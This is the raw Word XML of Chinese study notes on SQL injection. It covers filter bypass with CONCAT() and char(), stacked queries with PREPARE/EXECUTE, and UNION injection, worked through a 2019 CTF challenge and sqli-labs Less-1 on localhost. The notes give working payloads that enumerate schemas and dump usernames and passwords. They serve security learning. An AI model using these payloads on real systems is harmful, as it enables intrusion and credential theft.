        <w:rPr>
          <w:rStyle w:val="afc"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1E2673E7" wp14:editId="473CAEFB">
            <wp:extent cx="5274310" cy="27724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0D7F" w14:textId="0EDC608E" w:rsidR="003445E1" w:rsidRPr="003445E1" w:rsidRDefault="003445E1" w:rsidP="000874CF">
      <w:r w:rsidRPr="003445E1">
        <w:t>values ('100',‘yyh’,‘my name haha’)</w:t>
      </w:r>
      <w:r w:rsidRPr="003445E1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>记录成功插入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27BC7DD6" w14:textId="6A655DDF" w:rsidR="00EB080A" w:rsidRDefault="00ED182F" w:rsidP="00C21AF8">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a4"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a4"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="000F12DE">
        <w:rPr>
          <w:rStyle w:val="a4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00ED182F">
        <w:t>CONCAT()函数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3015B7E4" w14:textId="428CFB79" w:rsidR="00ED182F" w:rsidRDefault="007D3C88" w:rsidP="000874CF">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="a4"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D3C88">
        <w:rPr>
          <w:rStyle w:val="a4"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>CONCAT()函数可将两个或多个字符串连接成一个字符串</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a4"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>,可</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a4"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>应对服务器对</w:t>
      </w:r>
      <w:r w:rsidR="00887978">
        <w:rPr>
          <w:rStyle w:val="a4"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>某些字符串的过滤。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="520E84D7" w14:textId="2139EB0D" w:rsidR="00887978" w:rsidRDefault="00887978" w:rsidP="000874CF">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="a4"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00887978">
        <w:rPr>
          <w:rStyle w:val="a4"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>例题：[强网杯 2019]随便注 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19ED726A" w14:textId="764208AF" w:rsidR="00887978" w:rsidRDefault="00887978" w:rsidP="000874CF">
      <w:pPr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同时利用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a4"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a4"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>和3的方法，先输入</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="615DDC9A" w14:textId="27A6EDB4" w:rsidR="00887978" w:rsidRDefault="00BE455C" w:rsidP="000874CF">
      <w:r w:rsidRPr="00BE455C">
        <w:t>1';</w:t>
      </w:r>
      <w:r w:rsidR="00AF7847">
        <w:t>SHOW</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE455C">
        <w:t xml:space="preserve"> databases;#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EC0B8A1" w14:textId="31774BCD" w:rsidR="00BE455C" w:rsidRDefault="00BE455C" w:rsidP="000874CF">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查询数据表，</w:t>
      </w:r>
      <w:r w:rsidR="00DE10EA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>接着直接查当前数据表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48A3CE17" w14:textId="747ABCFC" w:rsidR="00DE10EA" w:rsidRDefault="00DE10EA" w:rsidP="000874CF">
      <w:r w:rsidRPr="00BE455C">
        <w:t>1';</w:t>
      </w:r>
      <w:r w:rsidR="00AF7847">
        <w:t>SHOW</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE455C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>tables</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE455C">
        <w:t>;#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3693EB0F" w14:textId="67E4A206" w:rsidR="00DE10EA" w:rsidRDefault="00DE10EA" w:rsidP="000874CF">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>显示有两个表，使用desc指令查看表结构，在第一个表发现flag</w:t>
      </w:r>
      <w:r w:rsidR="00AF7847">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，直接使用select语句查表发现select等词被过滤，故使用concat</w:t>
      </w:r>
      <w:r w:rsidR="00AF7847">
        <w:t>()</w:t>
      </w:r>
      <w:r w:rsidR="00AF7847">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数拼凑语句绕过过滤</w:t>
      </w:r>
      <w:r w:rsidR="00F23BC2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，输入</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09E2DF13" w14:textId="4C2CA989" w:rsidR="00B767D1" w:rsidRDefault="00817AA8" w:rsidP="000874CF">
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="0002768A">
        <w:t>'</w:t>
      </w:r>
      <w:r w:rsidR="00AC1495" w:rsidRPr="002469D6">
        <w:t>;</w:t>
      </w:r>
      <w:r w:rsidR="00AF7847" w:rsidRPr="002469D6">
        <w:t xml:space="preserve">PREPARE </w:t>
      </w:r>
      <w:r w:rsidR="00F556F6" w:rsidRPr="002469D6">
        <w:t>abc</w:t>
      </w:r>
      <w:r w:rsidR="00AF7847" w:rsidRPr="002469D6">
        <w:t xml:space="preserve"> from concat(</w:t>
      </w:r>
      <w:r w:rsidR="0002768A">
        <w:t>'</w:t>
      </w:r>
      <w:r w:rsidR="00AF7847" w:rsidRPr="002469D6">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="0002768A">
        <w:t>'</w:t>
      </w:r>
      <w:r w:rsidR="00AF7847" w:rsidRPr="002469D6">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="0002768A">
        <w:t>'</w:t>
      </w:r>
      <w:r w:rsidR="00AF7847" w:rsidRPr="002469D6">
        <w:t>elect</w:t>
      </w:r>
      <w:r w:rsidR="0002768A">
        <w:t>'</w:t>
      </w:r>
      <w:r w:rsidR="00AF7847" w:rsidRPr="002469D6">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="002469D6">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0002768A">
        <w:t>'</w:t>
      </w:r>
      <w:r w:rsidR="00B767D1" w:rsidRPr="002469D6">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00AF7847" w:rsidRPr="002469D6">
        <w:t xml:space="preserve">* from </w:t>
      </w:r>
      <w:r w:rsidR="00B767D1" w:rsidRPr="002469D6">
        <w:t>`</w:t>
      </w:r>
      <w:r w:rsidR="00AF7847" w:rsidRPr="002469D6">
        <w:t>1919810931114514</w:t>
      </w:r>
      <w:r w:rsidR="00B767D1" w:rsidRPr="002469D6">
        <w:t>`</w:t>
      </w:r>
      <w:r w:rsidR="002469D6" w:rsidRPr="002469D6">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0002768A">
        <w:t>'</w:t>
      </w:r>
      <w:r w:rsidR="00AF7847" w:rsidRPr="002469D6">
        <w:t xml:space="preserve">);EXECUTE </w:t>
      </w:r>
      <w:r w:rsidR="00F556F6" w:rsidRPr="002469D6">
        <w:t>abc</w:t>
      </w:r>
      <w:r w:rsidR="00AC1495" w:rsidRPr="002469D6">
        <w:t>;</w:t>
      </w:r>
      <w:r w:rsidR="00AF7847" w:rsidRPr="002469D6">
        <w:t>#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6870BDFD" w14:textId="08BD5B25" w:rsidR="00D13B5B" w:rsidRDefault="00D13B5B" w:rsidP="000874CF">
      <w:pPr>
        <w:pStyle w:val="af"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注：这一串数字表名必须用反引号括起，因为纯数字表名不符合正常的表名命名规则，用反应好括起用以区分是不是表名。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0266CD91" w14:textId="289505C4" w:rsidR="00D13B5B" w:rsidRDefault="00FB29C5" w:rsidP="000874CF">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>得到flag。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="780AEC25" w14:textId="77777777" w:rsidR="00300BB3" w:rsidRDefault="00300BB3" w:rsidP="000874CF"/>
    <w:p w14:paraId="2D1BB9CB" w14:textId="5F0E1CDF" w:rsidR="000F12DE" w:rsidRDefault="000F12DE" w:rsidP="00C21AF8">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00300BB3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000F12DE">
        <w:t>char</w:t>
      </w:r>
      <w:r>
        <w:t>()</w:t>
      </w:r>
      <w:r w:rsidRPr="000F12DE">
        <w:t>函数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ED4ACB2" w14:textId="43A7C4BA" w:rsidR="000F12DE" w:rsidRDefault="000F12DE" w:rsidP="000874CF">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>将ASCII码值转换为字符，用于绕过字符过滤。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A7DEB64" w14:textId="1C6FFFE0" w:rsidR="00B10906" w:rsidRDefault="00B10906" w:rsidP="000874CF">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如：修改上题payload为</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FB7F976" w14:textId="7F6F4B53" w:rsidR="00B10906" w:rsidRDefault="00B10906" w:rsidP="000874CF">
      <w:r w:rsidRPr="00B10906">
        <w:t>1';SET @</w:t>
      </w:r>
      <w:r w:rsidR="00E94918">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>abc</w:t>
      </w:r>
      <w:r w:rsidRPr="00B10906">
        <w:t>=concat(char(115,101,108,101,99,116),'* from</w:t>
      </w:r>
      <w:r w:rsidR="00E94918">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B10906">
        <w:t xml:space="preserve">`1919810931114514`');PREPARE </w:t>
      </w:r>
      <w:r w:rsidR="00E94918">
        <w:t>stmt</w:t>
      </w:r>
      <w:r w:rsidRPr="00B10906">
        <w:t xml:space="preserve"> from @</w:t>
      </w:r>
      <w:r w:rsidR="00E94918">
        <w:t>abc</w:t>
      </w:r>
      <w:r w:rsidRPr="00B10906">
        <w:t xml:space="preserve">;EXECUTE </w:t>
      </w:r>
      <w:r w:rsidR="00E94918">
        <w:t>stmt</w:t>
      </w:r>
      <w:r w:rsidRPr="00B10906">
        <w:t>;#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C7B7DD3" w14:textId="56122D45" w:rsidR="00E94918" w:rsidRDefault="00E94918" w:rsidP="000874CF">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>其中</w:t>
      </w:r>
      <w:r w:rsidRPr="00B10906">
        <w:t>char(115,101,108,101,99,116)</w:t>
      </w:r>
      <w:r w:rsidRPr="00E94918">
        <w:t xml:space="preserve"> &lt;-----&gt;'select'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="125F8437" w14:textId="77777777" w:rsidR="00300BB3" w:rsidRDefault="00300BB3" w:rsidP="000874CF"/>
    <w:p w14:paraId="3A5B9435" w14:textId="05DDBC6B" w:rsidR="00DC19B6" w:rsidRDefault="00DC19B6" w:rsidP="00C21AF8">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC19B6">
        <w:t xml:space="preserve"> UNION 联合查询注入</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26920307" w14:textId="4EE6C29C" w:rsidR="00DC19B6" w:rsidRDefault="00BC7923" w:rsidP="000874CF">
      <w:r w:rsidRPr="00BC7923">
        <w:t>UNION 语法：用于将多个select语句的结果组合起来，</w:t>
      </w:r>
      <w:r w:rsidR="00CB5536" w:rsidRPr="00C21AF8">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>UNION 内部的每个 SELECT 语句必须拥有相同数量和相同顺序的列，列也必须拥有相似的数据类型。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05C4C4ED" w14:textId="60076A89" w:rsidR="00CB5536" w:rsidRDefault="00CB5536" w:rsidP="000874CF">
      <w:r>
        <w:t>UNION</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注入流程：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CF32AC5" w14:textId="1B78D7C5" w:rsidR="00C21AF8" w:rsidRDefault="00C21AF8" w:rsidP="00C21AF8">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00C21AF8">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>id=1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07BC85D6" w14:textId="77777777" w:rsidR="00C21AF8" w:rsidRDefault="00C21AF8" w:rsidP="00C21AF8">
      <w:pPr>
        <w:ind w:firstLineChars="100" w:firstLine="210"/>
      </w:pPr>
      <w:r>
        <w:t>id=1'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="178EF5AB" w14:textId="7771DCD6" w:rsidR="00C21AF8" w:rsidRDefault="00C21AF8" w:rsidP="00C21AF8">
      <w:pPr>
        <w:ind w:firstLineChars="100" w:firstLine="210"/>
      </w:pPr>
      <w:r>
        <w:t>id=1' --+//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>判断注入类型</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C1B4B27" w14:textId="6B37C601" w:rsidR="00124FC2" w:rsidRDefault="00C21AF8" w:rsidP="00124FC2">
      <w:r>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00124FC2">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00CB5536">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>order</w:t>
      </w:r>
      <w:r w:rsidR="00CB5536">
        <w:t xml:space="preserve"> by</w:t>
      </w:r>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r w:rsidR="00124FC2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>确定列数。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17734123" w14:textId="569365DB" w:rsidR="00124FC2" w:rsidRDefault="00C21AF8" w:rsidP="00124FC2">
      <w:r>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="00124FC2">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00C21AF8">
        <w:t xml:space="preserve"> id=-1' union select 1,2,3 --+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidR="00124FC2" w:rsidRPr="00124FC2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查看</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>回显</w:t>
      </w:r>
      <w:r w:rsidR="00124FC2" w:rsidRPr="00124FC2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>点</w:t>
      </w:r>
      <w:r w:rsidR="00124FC2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="00124FC2" w:rsidRPr="00124FC2">
        <w:t>选取可以显示数据的位置</w:t>
      </w:r>
      <w:r w:rsidR="00124FC2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45CBFE54" w14:textId="37D93911" w:rsidR="00C21AF8" w:rsidRDefault="00C21AF8" w:rsidP="00124FC2">
      <w:r>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="00124FC2">
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如：</w:t>
      </w:r>
      <w:r w:rsidRPr="00C21AF8">
        <w:t>id=-1' union select 1,database(),3 --+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="236F20DC" w14:textId="1D0D10F9" w:rsidR="00872D68" w:rsidRDefault="00872D68" w:rsidP="00124FC2">
      <w:r w:rsidRPr="00872D68">
        <w:t xml:space="preserve">id=-1' union select 1,group_concat(table_name),3 from </w:t>
      </w:r>
      <w:r w:rsidRPr="00872D68">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>information_schema</w:t>
      </w:r>
      <w:r w:rsidRPr="00872D68">
        <w:t>.tables where table_schema='security' --+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31A2F7C9" w14:textId="25BF3AAE" w:rsidR="00124FC2" w:rsidRDefault="00C21AF8" w:rsidP="00124FC2">
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r w:rsidR="00124FC2" w:rsidRPr="00124FC2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>读库、读表、读数据</w:t>
      </w:r>
      <w:r w:rsidR="00124FC2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AD8AC56" w14:textId="3C3F6DEA" w:rsidR="00300BB3" w:rsidRDefault="00BD646B" w:rsidP="00124FC2">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD646B">
        <w:t>group_concat()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数将所有内容在一行中输出</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6868893D" w14:textId="74E39C9D" w:rsidR="00BD646B" w:rsidRDefault="00BD646B" w:rsidP="00124FC2">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注：</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD646B">
        <w:t>information_schema是mysql自带的库，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD646B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD646B">
        <w:t>mysql的版本5.0之后产生的，一个虚拟数据库</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD646B">
        <w:t>记录了该数据库所有的表名和字段名</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，在注入时非常有用。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AFC17BD" w14:textId="339C3325" w:rsidR="004837FA" w:rsidRPr="004837FA" w:rsidRDefault="004837FA" w:rsidP="00124FC2">
      <w:pPr>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004837FA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>例题：sqli</w:t>
      </w:r>
      <w:r w:rsidRPr="004837FA">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> labs less 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A62E803" w14:textId="2643B5F6" w:rsidR="004837FA" w:rsidRDefault="004837FA" w:rsidP="00124FC2">
      <w:r w:rsidRPr="004837FA">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="65DDECBB" wp14:editId="586E9B2B">
            <wp:extent cx="5274310" cy="14585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6314" w14:textId="603224C4" w:rsidR="004837FA" w:rsidRDefault="004837FA" w:rsidP="00124FC2">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="004837FA">
        <w:t xml:space="preserve"> http://127.0.0.1/sql1/Less-1/?id=1%27--+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注入点为字符型；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EB966F7" w14:textId="1622D78B" w:rsidR="004837FA" w:rsidRDefault="004837FA" w:rsidP="00124FC2">
      <w:r w:rsidRPr="004837FA">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="51B3A179" wp14:editId="49A0978C">
            <wp:extent cx="5274310" cy="1447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0880" w14:textId="50763625" w:rsidR="004837FA" w:rsidRDefault="004837FA" w:rsidP="00124FC2">
      <w:r>
        <w:t>2.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>order</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> by</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>确定列数为3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70ED2D88" w14:textId="3EE14E9C" w:rsidR="004837FA" w:rsidRDefault="004837FA" w:rsidP="00124FC2">
      <w:r w:rsidRPr="004837FA">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="64918C17" wp14:editId="5F1E5BE0">
            <wp:extent cx="5274310" cy="14503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129B" w14:textId="77777777" w:rsidR="001D176B" w:rsidRDefault="004837FA" w:rsidP="00124FC2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爆库名；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42E9D6D5" w14:textId="1FE38265" w:rsidR="003733D7" w:rsidRDefault="001D176B" w:rsidP="00124FC2">
      <w:r>
        <w:t>4.</w:t>
      </w:r>
      <w:r w:rsidR="003733D7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>爆表名</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="407791C5" w14:textId="4410B9F2" w:rsidR="001D176B" w:rsidRDefault="003733D7" w:rsidP="00124FC2">
      <w:r w:rsidRPr="003733D7">
        <w:t>http://127.0.0.1/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sql1</w:t>
      </w:r>
      <w:r w:rsidRPr="003733D7">
        <w:t>/Less-1/?id=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="003733D7">
        <w:t>'union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() --+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0779CCA9" w14:textId="0515423F" w:rsidR="004837FA" w:rsidRDefault="001D176B" w:rsidP="00124FC2">
      <w:r>
        <w:t>5.</w:t>
      </w:r>
      <w:r w:rsidR="003733D7" w:rsidRPr="003733D7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>爆列</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B9B293B" w14:textId="37A58A18" w:rsidR="003733D7" w:rsidRDefault="003733D7" w:rsidP="00124FC2">
      <w:r w:rsidRPr="003733D7">
        <w:t>http://127.0.0.1/sql</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="003733D7">
        <w:t>/Less-1/?id=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="003733D7">
        <w:t>' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users' --+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64AF7E61" w14:textId="311D2634" w:rsidR="003733D7" w:rsidRDefault="003733D7" w:rsidP="00124FC2">
      <w:r w:rsidRPr="003733D7">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="464F59C7" wp14:editId="1C02107E">
            <wp:extent cx="5274310" cy="16764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B865" w14:textId="7AC6CCA3" w:rsidR="003733D7" w:rsidRDefault="003733D7" w:rsidP="00124FC2">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>爆值</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06698035" w14:textId="228B2A1A" w:rsidR="003733D7" w:rsidRPr="00BD646B" w:rsidRDefault="003733D7" w:rsidP="00124FC2">
      <w:r w:rsidRPr="003733D7">
        <w:t>http://127.0.0.1/sql</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="003733D7">
        <w:t>/Less-1/?id=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="003733D7">
        <w:t>'union</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003733D7">
        <w:t>select</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003733D7">
        <w:t>1,group_concat(username,0x3a,password),3 from users--+</w:t>
      </w:r>
    </w:p>
